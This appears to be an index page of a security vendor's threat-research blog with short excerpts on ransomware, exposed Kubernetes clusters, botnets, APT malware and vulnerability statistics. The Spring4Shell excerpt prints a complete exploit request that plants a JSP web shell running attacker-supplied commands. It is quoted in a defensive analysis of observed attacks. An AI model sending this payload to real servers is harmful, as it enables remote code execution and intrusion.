New Linux-Based Ransomware Cheerscrypt Targets ESXi Devices

Category: Ransomware | By: Arianne Dela Cruz, Byron Gelera, McJustine De Guzman, Warren Sto.Tomas | May 25, 2022

Trend Micro Research detected "Cheerscrypt", a new Linux-based ransomware variant that compromises ESXi servers. We discuss our initial findings in this report. We recently observed multiple Linux-based ransomware detections that malicious actors launched to target VMware ESXi servers, a bare-metal hypervisor for creating and running several virtual machines (VMs)…

The Fault in Our kubelets: Analyzing the Security of Publicly Exposed Kubernetes Clusters

Category: Cloud | By: Magno Logan | May 24, 2022

While researching cloud-native tools, our Shodan scan revealed over 200,000 publicly exposed Kubernetes clusters and kubelet ports that can be abused by criminals. While researching cloud-native tools and how they can reveal information about a system or an organization, we came across some data sets from Shodan concerning Kubernetes clusters (aka…

Uncovering a Kingminer Botnet Attack Using Trend Micro Managed XDR

By: Buddy Tancio, Jed Valderama | May 18, 2022

Trend Micro's Managed XDR team addressed a Kingminer botnet attack conducted through an SQL exploit. We discuss our findings and analysis in this report. We observed malicious activities in a client's SQL server that flagged a potential exploit in one public-facing device. A quick look at the Trend Micro Vision One™ Workbench showed…

AvosLocker Ransomware Variant Abuses Driver File to Disable Anti-Virus, Scans for Log4shell

From the report's conclusion: While AvosLocker has been documented for abusing AnyDesk as its preferred tool for lateral movement, we note that other remote access applications can be abused in its place. The same can be said for the software deployment tool, which the malicious actors can later replace with other commercially available ones. In addition, aside from its availability, the decision to choose the specific rootkit driver…

New APT Group Earth Berberoka Targets Gambling Websites With Old and New Malware

We dubbed these downloaders PuppetDownloaders since they are connected to the PuppetLoader malware family, as evidenced by our observations:

- This malware and PuppetLoader both use the same string decryption routine with the same key.
- This malware and PuppetLoader both use the same XOR key (2726c6aea9970bb95211304705b5f595) to decrypt the embedded Loader.dll file.
- This malware's and PuppetLoader's decrypted Loader.dlls share similar strings such as "[-] UnExist pwszModuleFunName:".

This suggests that a common framework…

Here’s a Path to Better Attack Surface Risk Management

So, how can security leaders stay on top of their attack surface and ahead of the bad guys? By leveraging a unified cybersecurity platform that enables continuous security visibility and monitoring across the discovery, assessment, and mitigation phases of the attack surface risk lifecycle. Let's dive deeper into how a platform can enhance attack surface risk management compared with point products.

Discover your digital attack surface

First, you need total visibility to be able to…

Attack Surface Management Partner Bit Discovery Bolsters Offering

Security starts with visibility: you can't protect what you can't see. And yet, this is a perennial problem in cybersecurity. We're excited to bring attack surface discovery capabilities to the Trend Micro One platform, providing ongoing visibility not only into internal assets (devices, identities, applications) but also into external, Internet-facing assets. We're doing the latter in partnership with Bit Discovery, an innovative start-up founded by Jeremiah Grossman (previously co-founder of WhiteHat Security). How bad is the attack…

Spring4Shell Vulnerability CVE-2022-22965 Exploited to Deploy Cryptocurrency Miners

Among the exploitation attempts were ones aimed at deploying cryptocurrency miners. In this section, we look at how the malicious actors behind these exploitation attempts create a web shell to deploy their cryptocurrency miners. The following request is used to create the web shell:

    GET /?class.module.classLoader.resources.context.parent.pipeline.first.prefix=zbc0fb&class.module.classLoader.resources.context.parent.pipeline.first.fileDateFormat=&class.module.classLoader.resources.context.parent.pipeline.first.directory=webapps%2FROOT&class.module.classLoader.resources.context.parent.pipeline.first.suffix=.jsp&class.module.classLoader.resources.context.parent.pipeline.first.pattern=%25%7Bx%7Di+try+%7BRuntime.getRuntime%28%29.exec%28System.getProperty%28%22os.name%22%29.contains%28%22ndo%22%29+%3F+new+String%5B%5D%7B%22cmd.exe%22%2C+%22%2Fc%22%2C+request.getParameter%28%22w%22%29%7D+%3A+new+String%5B%5D%7B%22%2Fbin%2Fsh%22%2C+%22-c%22%2C+request.getParameter%28%22l%22%29%7D%29%3B%7D+catch+%28Exception+e%29+%7B%7D%3Bout.print%28%22%40pong%22%29%3B+%25%7Bz%7Di HTTP/1.1
    Host: <redacted>:<redacted>
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:83.0) Gecko/20100101 Firefox/83.0
    Accept: */*
    Accept-Language: en-US,en;q=0.5
    X: <%
    Y: Runtime
    Z: %>//
    Accept-Encoding: gzip

The web shell's…

An Investigation of the BlackCat Ransomware via Trend Micro Vision One

Category: Ransomware | By: Lucas Silva, Leandro Froes | April 18, 2022

We recently investigated a case related to the BlackCat ransomware group using the Trend Micro Vision One™ platform, which comes with extended detection and response (XDR) capabilities. BlackCat (aka AlphaVM or AlphaV) is a ransomware family created in the Rust programming language and operated under a ransomware-as-a-service (RaaS) model…

An In-Depth Look at ICS Vulnerabilities Part 3

The chart shows what percentage of the ICS-affecting vulnerabilities identified in 2021 advisories is caused by each kind of coding weakness ("flaws, faults, bugs, or other errors"). Nine percent were caused by CWE-119 Improper Restriction of Operations within the Bounds of a Memory Buffer, while CWE-787 Out-of-Bounds Write accounted for 8.3%. A further 6.7% were caused by CWE-20 Improper Input Validation and 4.8% by CWE-79 Improper Neutralization of Input…
